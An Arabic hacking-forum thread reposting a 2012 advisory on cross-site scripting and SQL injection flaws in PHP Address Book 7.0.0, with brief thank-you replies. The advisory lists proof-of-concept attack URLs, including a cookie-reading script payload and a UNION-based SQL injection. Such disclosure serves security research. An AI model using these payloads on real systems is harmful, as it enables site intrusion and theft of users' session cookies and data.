اشترك في قناتنا ليصلك جديدنا

اشترك في قناتنا على اليوتيوب ليصلك جديدنا

كذلك الاعجاب بصفحتنا على الفيسبوك

ثغرة جديده { PHP Address Book 7.0.0 Multiple Vulnerabilities }

ثغرة جديده { PHP Address Book 7.0.0 Multiple Vulnerabilities }


النتائج 1 إلى 3 من 3

الموضوع: ثغرة جديده { PHP Address Book 7.0.0 Multiple Vulnerabilities }

  1. #1
    هكر مجتهد Array الصورة الرمزية اخلاقي تاج راسي
    تاريخ التسجيل
    Apr 2010
    المشاركات
    273

    Gadid ثغرة جديده { PHP Address Book 7.0.0 Multiple Vulnerabilities }



    [
    بسم الله الرحمن الرحيم


    ################################################## ################################
    # Advisory: PHP Address Book 7.0.0 Multiple security vulnerabilities
    # Advisory ID: SSCHADV2012-013
    # Author: Stefan Schurtz
    # Affected Software: Successfully tested on PHP Address Book 7.0.0
    # Vendor URL: http://sourceforge.net/projects/php-addressbook/
    # Vendor Status: informed
    ################################################## ################################

    ==========================
    Vulnerability Description
    ==========================

    PHP Address Book 7.0.0 is prone to multiple XSS and SQLi vulnerabilities

    ==================
    PoC-Exploit
    ==================

    // XSS

    http://[target]/addressbookv7.0.0/preferences.php?from='"</script>**********alert('xss')</script>
    http://[target]/addressbookv7.0.0/group.php/" />********** alert('xss')</script>
    http://[target]/addressbookv7.0.0/index.php?group='"</script>**********alert(document.cookie)</script>

    // SQLi

    http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1<2,2,1)
    http://[target]/addressbookv7.0.0/edit.php?id=1 AND 1=IF(1>2,2,1)

    // UNION-based Injection, needs 'magic_quotes=off'
    http://[target]/addressbookv7.0.0/view.php?id=1' UNION ALL SELECT NULL, NULL, version(), NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--+

    ====================
    Disclosure Timeline
    ====================

    03-Mar-2012 - vendor informed

    ========
    Credits
    ========

    Vulnerabilities found and advisory written by Stefan Schurtz.

    ===========
    References
    ===========

    http://sourceforge.net/tracker/?grou...4&atid=8059299
    http://www.darksecurity.de/advisorie...DV2012-013.txt


    رابط الثغرة : http://www.exploit-db.com/exploits/18899





    تحياتي



  2. #2
    :: مشرف قسم الباك تراك :: Array الصورة الرمزية يارب رحمتك
    تاريخ التسجيل
    May 2012
    الدولة
    روح العرب
    المشاركات
    1,147

    افتراضي رد: ثغرة جديده { PHP Address Book 7.0.0 Multiple Vulnerabilities }

    بصرآحة انا موِش عآرف آقول آية لمجهوٍِدك دا ....

    ربنا يحفظك ويزيدك من علْمو ...

    بآلتوفيق عزيزى


  3. #3
    هكر مجتهد Array الصورة الرمزية اخلاقي تاج راسي
    تاريخ التسجيل
    Apr 2010
    المشاركات
    273

    افتراضي رد: ثغرة جديده { PHP Address Book 7.0.0 Multiple Vulnerabilities }

    بصرآحة انا موِش عآرف آقول آية لمجهوٍِدك دا ....

    ربنا يحفظك ويزيدك من علْمو ...

    بآلتوفيق عزيزى
    ربي يعطيكـ العافيه
    شاكرلكـ على مروركـ

    تـحـيآتي



المواضيع المتشابهه

  1. ثغره جديده { Free Realty v3.1-0.6 Multiple Vulnerabilities }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 2
    آخر مشاركة: 05-24-2012, 06:11 AM
  2. ثغره جديده { Travelon Express CMS v6.2.2 Multiple Vulnerabilities }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 1
    آخر مشاركة: 05-14-2012, 02:46 PM
  3. ثغره جديده { Proman Xpress v5.0.1 Multiple Vulnerabilities }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 05-14-2012, 06:52 AM
  4. ثغره جديده { Viscacha Forum CMS v0.8.1.1 Multiple Vulnerabilities }
    بواسطة اخلاقي تاج راسي في المنتدى قسم الثغرات
    مشاركات: 0
    آخر مشاركة: 05-14-2012, 06:48 AM
  5. ثغرة ابلود جديده
    بواسطة kad2006 في المنتدى قسم الثغرات
    مشاركات: 3
    آخر مشاركة: 01-15-2010, 05:48 PM

وجد الزوار هذه الصفحة بالبحث عن:

المصارعثقلي

0 multiple 0

ثغرة PHP multiple vulnerabilities

ادرس الثغرات

المفضلات

أذونات المشاركة

  • لا تستطيع إضافة مواضيع جديدة
  • لا تستطيع الرد على المواضيع
  • لا تستطيع إرفاق ملفات
  • لا تستطيع تعديل مشاركاتك
  •